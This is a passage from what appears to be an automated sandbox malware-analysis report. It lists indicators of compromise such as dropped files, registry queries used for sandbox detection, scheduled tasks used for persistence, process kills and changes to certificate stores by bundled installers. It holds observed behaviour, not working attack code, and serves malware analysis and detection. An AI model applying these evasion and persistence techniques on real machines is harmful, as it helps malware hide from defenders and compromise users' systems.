(x86)\VR\Versium Research\d.jfm jg7_7wjg.exe File opened for modification C:\Program Files\install.dll 19.exe File opened for modification C:\Program Files (x86)\Install engine 16\Swap.dll IBInstaller_97039.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-PR44O.tmp vpn.tmp File created C:\Program Files (x86)\Wandering-Wildflower\winamp.7z app.exe File created C:\Program Files (x86)\I-record\is-SUS9S.tmp irecord.tmp File opened for modification C:\Program Files (x86)\Picture Lab\AForge.dll prolab.tmp File created C:\Program Files (x86)\Picture Lab\is-NEPPN.tmp prolab.tmp File opened for modification C:\Program Files (x86)\Install engine 16\PPMd.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\libCommon.dll vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-D0HQV.tmp vpn.tmp File opened for modification C:\Program Files (x86)\MaskVPN\tunnle.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\winxp32\is-P0H8F.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\avfilter-2.dll irecord.tmp File created C:\Program Files (x86)\I-record\is-5U2HV.tmp irecord.tmp File created C:\Program Files (x86)\I-record\is-007PB.tmp irecord.tmp File created C:\Program Files (x86)\Picture Lab\is-EPFDJ.tmp prolab.tmp File opened for modification C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win732\is-1QUQK.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\driver\win764\is-NRC09.tmp vpn.tmp File created C:\Program Files\javcse\install.dll 22.exe File created C:\Program Files\Windows Multimedia Platform\RWQHPJPTHG\irecord.exe Microsoft.exe File opened for modification C:\Program Files (x86)\I-record\Bunifu_UI_v1.52.dll irecord.tmp File opened for modification C:\Program Files (x86)\MaskVPN\driver\winxp32\devcon.exe vpn.tmp File created C:\Program Files (x86)\Install engine 16\is-398S7.tmp IBInstaller_97039.tmp File created C:\Program Files (x86)\Wandering-Wildflower\7zxa.dll app.exe File opened for modification C:\Program Files (x86)\VR\Versium Research\d jg7_7wjg.exe File opened for modification C:\Program Files (x86)\MaskVPN\ssleay32.dll vpn.tmp File created C:\Program Files (x86)\Late-Water\help.txt 1s3e04nqvcn.exe File created C:\Program Files (x86)\VR\Versium Research\d.jfm jg7_7wjg.exe File created C:\Program Files (x86)\MaskVPN\driver\win764\is-E109T.tmp vpn.tmp File opened for modification C:\Program Files (x86)\I-record\i-record.exe irecord.tmp File opened for modification C:\Program Files (x86)\Install engine 16\networkinspection.dll IBInstaller_97039.tmp File opened for modification C:\Program Files (x86)\MaskVPN\mask_svc.exe vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-N1LIR.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-UO3JJ.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-4SP8N.tmp vpn.tmp File created C:\Program Files (x86)\MaskVPN\is-CHU6G.tmp vpn.tmp File created C:\Program Files (x86)\I-record\is-CT03O.tmp irecord.tmp File created C:\Program Files (x86)\Picture Lab\is-O4SLI.tmp prolab.tmp File opened for modification C:\Program Files\install.vbs 19.exe -
Drops file in Windows directory 31 IoCs
Processes:
WerFault.exesvchost.exesvchost.exemsiexec.exeDrvInst.exeDrvInst.exeMicrosoftEdge.exeMicrosoftEdge.exemultitimer.exeaipackagechainer.exedescription ioc process File opened for modification C:\Windows\INF\setupapi.dev.log WerFault.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Tasks\.job svchost.exe File opened for modification C:\Windows\Installer\MSID5A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI461E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4768.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI493E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4E41.tmp msiexec.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Installer\MSI9F2C.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICAFD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF9DF.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF49E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIB17.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File created C:\Windows\Installer\f76b2f0.msi msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Installer\MSI46EA.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\security.config.cch.new multitimer.exe File created C:\Windows\Microsoft.NET\Framework64\v2.0.50727\config\enterprisesec.config.cch.new multitimer.exe File opened for modification C:\Windows\Installer\f76b2f0.msi msiexec.exe File opened for modification C:\Windows\Installer\MSIFCAE.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\Tasks\.job aipackagechainer.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 36 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5064 1924 WerFault.exe keygen-step-2.exe 6036 5396 WerFault.exe winlthsth.exe 4888 2908 WerFault.exe ujrfw5dzs5t.exe 3136 2908 WerFault.exe ujrfw5dzs5t.exe 6012 2908 WerFault.exe ujrfw5dzs5t.exe 5032 2908 WerFault.exe ujrfw5dzs5t.exe 1528 2908 WerFault.exe ujrfw5dzs5t.exe 6064 2908 WerFault.exe ujrfw5dzs5t.exe 984 2908 WerFault.exe ujrfw5dzs5t.exe 5496 2908 WerFault.exe ujrfw5dzs5t.exe 2132 6028 WerFault.exe winhost.exe 8244 6072 WerFault.exe ikddp5f5nna.exe 8368 6072 WerFault.exe ikddp5f5nna.exe 8520 6072 WerFault.exe ikddp5f5nna.exe 8656 6072 WerFault.exe ikddp5f5nna.exe 9128 6072 WerFault.exe ikddp5f5nna.exe 8564 6072 WerFault.exe ikddp5f5nna.exe 5572 6072 WerFault.exe ikddp5f5nna.exe 344 6072 WerFault.exe ikddp5f5nna.exe 8504 8232 WerFault.exe e1t2vabb1cz.exe 3052 8232 WerFault.exe e1t2vabb1cz.exe 8464 8232 WerFault.exe e1t2vabb1cz.exe 5748 8232 WerFault.exe e1t2vabb1cz.exe 8956 8232 WerFault.exe e1t2vabb1cz.exe 2916 8232 WerFault.exe e1t2vabb1cz.exe 9064 8232 WerFault.exe e1t2vabb1cz.exe 8364 8232 WerFault.exe e1t2vabb1cz.exe 5816 6780 WerFault.exe winhost.exe 10328 1584 WerFault.exe s35x5lnd2qo.exe 10420 1584 WerFault.exe s35x5lnd2qo.exe 10528 1584 WerFault.exe s35x5lnd2qo.exe 10592 1584 WerFault.exe s35x5lnd2qo.exe 10688 1584 WerFault.exe s35x5lnd2qo.exe 10888 1584 WerFault.exe s35x5lnd2qo.exe 11000 1584 WerFault.exe s35x5lnd2qo.exe 11120 1584 WerFault.exe s35x5lnd2qo.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
DrvInst.exesvchost.exeConhost.exeDrvInst.exeWerFault.exetapinstall.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Mfg Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Service DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\LowerFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A Conhost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags WerFault.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D Conhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 tapinstall.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 WerFault.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RunWW.execmd.exesvchost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RunWW.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz cmd.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RunWW.exe -
Creates scheduled task(s) 1 TTPs 14 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 8848 schtasks.exe 9644 schtasks.exe 6672 schtasks.exe 9552 schtasks.exe 9864 schtasks.exe 10020 schtasks.exe 7332 schtasks.exe 9900 schtasks.exe 9944 schtasks.exe 10144 schtasks.exe 6284 schtasks.exe 8808 schtasks.exe 5440 schtasks.exe 9816 schtasks.exe -
Delays execution with timeout.exe 8 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 4624 timeout.exe 8072 timeout.exe 7860 timeout.exe 6516 timeout.exe 8740 timeout.exe 9460 timeout.exe 5612 timeout.exe 4728 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
multitimer.exexcopy.exexcopy.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer multitimer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier xcopy.exe -
GoLang User-Agent 28 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 854 Go-http-client/1.1 HTTP User-Agent header 855 Go-http-client/1.1 HTTP User-Agent header 921 Go-http-client/1.1 HTTP User-Agent header 1856 Go-http-client/1.1 HTTP User-Agent header 1910 Go-http-client/1.1 HTTP User-Agent header 538 Go-http-client/1.1 HTTP User-Agent header 1478 Go-http-client/1.1 HTTP User-Agent header 1909 Go-http-client/1.1 HTTP User-Agent header 920 Go-http-client/1.1 HTTP User-Agent header 1477 Go-http-client/1.1 HTTP User-Agent header 1527 Go-http-client/1.1 HTTP User-Agent header 932 Go-http-client/1.1 HTTP User-Agent header 1857 Go-http-client/1.1 HTTP User-Agent header 1863 Go-http-client/1.1 HTTP User-Agent header 658 Go-http-client/1.1 HTTP User-Agent header 1530 Go-http-client/1.1 HTTP User-Agent header 374 Go-http-client/1.1 HTTP User-Agent header 386 Go-http-client/1.1 HTTP User-Agent header 537 Go-http-client/1.1 HTTP User-Agent header 740 Go-http-client/1.1 HTTP User-Agent header 1894 Go-http-client/1.1 HTTP User-Agent header 1898 Go-http-client/1.1 HTTP User-Agent header 867 Go-http-client/1.1 HTTP User-Agent header 931 Go-http-client/1.1 HTTP User-Agent header 912 Go-http-client/1.1 HTTP User-Agent header 917 Go-http-client/1.1 HTTP User-Agent header 922 Go-http-client/1.1 HTTP User-Agent header 1861 Go-http-client/1.1 -
Kills process with taskkill 6 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 500 taskkill.exe 4496 taskkill.exe 7180 taskkill.exe 6136 taskkill.exe 4964 taskkill.exe 10224 taskkill.exe -
Processes:
browser_broker.exeMicrosoftEdgeCP.exeMicrosoftEdge.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdge.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
mask_svc.exeapp.exe1s3e04nqvcn.exeDrvInst.execmd.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-112 = "Eastern Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-335 = "Jordan Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1872 = "Russia TZ 7 Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1411 = "Syria Daylight Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-434 = "Georgian Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1842 = "Russia TZ 4 Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time" 1s3e04nqvcn.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" mask_svc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time" mask_svc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust app.exe Key created 